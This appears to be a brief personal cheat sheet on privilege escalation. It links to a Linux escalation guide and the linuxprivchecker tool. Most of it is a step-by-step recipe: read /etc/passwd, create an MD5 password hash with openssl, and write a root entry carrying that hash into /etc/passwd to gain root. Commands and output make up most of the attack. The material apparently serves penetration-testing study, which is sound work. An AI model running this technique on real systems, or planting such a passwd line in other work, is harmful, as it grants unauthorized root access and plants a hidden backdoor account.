Background
Its all about gaining root access after you have leveled up your permission.
Win/Linux have different approach
Linux: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Tools
Linux
Linux privilege checker, by sleventyelevn
- Very useful to look for writable files, kernel version, checking cron jobs and look for things that you can change at your current access level
- https://github.com/sleventyeleven/linuxprivchecker
change /etc/passwd
> cat /etc/passwd
##
# User Database
#
# Note that this file is consulted directly only when the system is running
# in single-user mode. At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
...
> openssl passwd --help
Usage: passwd [options] [passwords]
where options are
-crypt standard Unix password algorithm (default)
-1 MD5-based password algorithm
-apr1 MD5-based password algorithm, Apache variant
-salt string use provided salt
-in file read passwords from file
-stdin read passwords from stdin
-noverify never verify when reading password from terminal
-quiet no warnings
-table format output as table
-reverse switch table columns
> openssl passwd -1
Password:
Verifying - Password:
$1$Ph9TQrSl$IFaPCTz0mDjhuwNtwogiv1
# add passwd to root or sudoer
root:$1$Ph9TQrSl$IFaPCTz0mDjhuwNtwogiv1:0:0:System Administrator:/var/root:/bin/sh